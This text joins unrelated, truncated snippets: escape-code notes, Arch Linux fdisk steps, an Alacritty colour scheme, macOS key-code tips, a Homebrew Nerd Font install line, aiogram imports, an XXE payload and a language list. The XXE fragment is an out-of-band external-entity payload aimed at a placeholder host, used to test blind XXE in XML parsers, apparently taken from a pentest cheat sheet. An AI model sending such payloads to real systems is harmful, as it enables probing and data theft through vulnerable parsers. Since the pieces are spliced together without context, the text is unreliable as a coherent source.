Standard escape codes are prefixed with Escape:
- Ctrl-Key:
^[ - Octal:
\033 - Unicode:
\u001b - Hexadecimal:
\x1B - Decimal:
27
| timedatectl set-ntp true | |
| timedatectl set-timezone Europe/Bucharest | |
| fdisk /dev/sda | |
| ######################################## | |
| n 1G pentru /boot /dev/sda1 | |
| a - Flag it as bootable | |
| n - 4G pentru swap /dev/sda3 | |
| n - 70G pentru / /dev/sda2 |
| colors: | |
| primary: | |
| background: "#282a36" | |
| foreground: "#f8f8f2" | |
| bright_foreground: "#ffffff" | |
| cursor: | |
| text: "#282a36" | |
| cursor: "#f8f8f2" | |
| vi_mode_cursor: | |
| text: CellBackground |
Ctrl + F keys and a lot of other key combinations are hooked by MacOs. You're mostly don't use them, so just turn everything off in System Preferences -> Keyboard -> Shortcuts. If you have another software that handles your key combinations, like Keyboard Maestro, you should turn these actions/macros off, otherwise you won't get right hex sequence.
Enter command below in default MacOs Terminal. (Warning!: shortcuts can also be hooked by terminal emulators, like iTerm. To avoid it use default MacOs terminal. If you are on alacritty, you can enter alacritty --print-events and use poped up terminal).
xxd -psgthen type your key combination and hit enter. (Warning!: if you don't see any output for your combination, then read step 1 again)
https://www.nerdfonts.com/font-downloads
The following solution thanks to @hackerzgz & @snacky101 will install all nerd fonts;
brew tap homebrew/cask-fonts
brew search '/font-.*-nerd-font/' | awk '{ print $1 }' | xargs -I{} brew install --cask {} || true| import asyncio | |
| import logging | |
| from aiogram.fsm.state import State, StatesGroup | |
| from aiogram.fsm.context import FSMContext | |
| from aiogram.fsm.storage.memory import SimpleEventIsolation | |
| from aiogram import Bot, Dispatcher, types, F, Router | |
| from aiogram.types import Message | |
| from aiogram.utils.keyboard import InlineKeyboardBuilder | |
| from aiogram.filters.command import Command |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| abap | |
| amdgpu | |
| apl | |
| abnf | |
| actionscript 3 | |
| actionscript | |
| ada | |
| adl | |
| agda | |
| aheui |